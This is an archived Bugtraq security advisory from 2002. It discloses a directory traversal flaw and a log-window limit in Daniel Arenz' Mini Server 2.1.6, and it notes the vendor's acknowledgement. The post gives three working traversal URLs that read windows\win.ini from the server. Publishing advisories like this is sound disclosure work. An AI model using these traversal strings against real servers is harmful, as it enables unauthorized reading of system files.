Home page logo
/

bugtraq logo Bugtraq mailing list archives

Directory traversal in Daniel Arenz' Mini Server
From: Marc Ruef <marc.ruef () computec ch>
Date: Sun, 13 Oct 2002 10:29:53 +0200

Hi!

There is a directory traversal flaw in Daniel Arenz' Mini Server 2.1.6
(tested on Windows XP Professional). It could be that prior versions are
also affected.

It's possible to show every by the web server readable file on the
target system by using one of the following URLs:

http://192.168.0.2/../../windows\win.ini
http://192.168.0.2/..\..\windows\win.ini
http://192.168.0.2/AAA[...]AAA..\..\..\..\windows\win.ini

It should not be possible to hop through the file system by using some
metacharacters (e.g. "..").

Another problem is, that the log window has an upper limit for entries.
If the window is full, there could no more entries be added.

It would make sense to overwrite the first records or clear the whole
window after the overflow.

My email to Daniel was sent on 02/10/12. He acknowledged a day later the
vulnerability and wrote, that he'll fix the bug(s) in the upcoming
version 3.0.

Bye, Marc

-- 
Computer, Technik und Security
http://www.computec.ch


  By Date           By Thread  

Current thread:
  • Directory traversal in Daniel Arenz' Mini Server Marc Ruef (Oct 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault